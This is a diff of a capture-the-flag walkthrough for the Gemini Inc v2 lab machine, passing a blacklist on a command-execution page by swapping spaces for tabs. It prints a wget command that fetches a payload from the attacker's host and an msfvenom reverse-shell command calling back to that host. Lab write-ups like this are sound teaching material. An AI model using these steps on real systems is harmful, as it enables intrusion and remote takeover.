limbernie/limbernie.github.io/_posts/2018-06-03-gemini-inc-v2-walkthrough.md

 ![0.zjtyxnja1w](/assets/images/posts/gemini-inc-v2-walkthrough/0.zjtyxnja1w.png)

-Something strikes me as familiar when I look at the HTML source of the **Execute Command** page at `/new-groups.php`.
+Something strikes me as familiar when I look at the HTML source of `/new-groups.php` — the **Execute Command** page.

 ![0.747hclxg2ig](/assets/images/posts/gemini-inc-v2-walkthrough/0.747hclxg2ig.png)

 Recall the file `blacklist.txt` uncovered during fuzzing?
 It had a test for illegal characters in the `testcmd` parameter.
-Here we have, a readily available web shell that executes commands, and yet we have to get pass the test for illegal characters.
+Here we have, a readily available web shell that executes commands, and yet we have to bypass the test for illegal characters.
 What a bummer!

 ![0.y241xdjfa4g](/assets/images/posts/gemini-inc-v2-walkthrough/0.y241xdjfa4g.png)

 ### Execute Command

-The most common shell in Linux distributions is `bash` and it uses whitespace as the separator for command execution.
-For example, in this command `wget -O /tmp/rev 192.168.10.128/rev`, the space character is the separator.
+The most common shell in Linux distributions is `bash` and it uses whitespace as the separator between the command, option(s), and argument(s).
+For example, in this command execution —  `wget -O /tmp/rev 192.168.10.128/rev`, the space character is the separator between the command `wget`, the option `-O`, and the arguments `/tmp/rev` and `192.168.10.128/rev`.
 In fact, `bash` defines space, tab, and the newline character as whitespace.
-In other words, we can substitute space with tab in the previous command and it should execute.
+In other words, we can substitute the space character (`\x20`) with the tab character (`\x09`) in the previous example and it would still execute.

-With this in mind, let's generate a reverse shell with `msfvenom` and name it as `rev`; host it with Python's `SimpleHTTPServer`, and execute `wget` in the **Execute Command** page to copy it over.
-The aim is to execute the reverse shell in the **Execute Command** page.
+With this in mind, let's generate a reverse shell with `msfvenom` and name it as `rev`; host it with Python's `SimpleHTTPServer`, and execute `wget -O /tmp/rev 192.168.10.128/rev` in the **Execute Command** page to transfer it over, replacing the space character with the tab character.
+We then execute `/tmp/rev` in the **Execute Command** page to launch the reverse shell.
+We also need to get the `netcat` listener ready to catch the reverse shell.

 ```
 # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.10.128 LPORT=4444 -f elf -o rev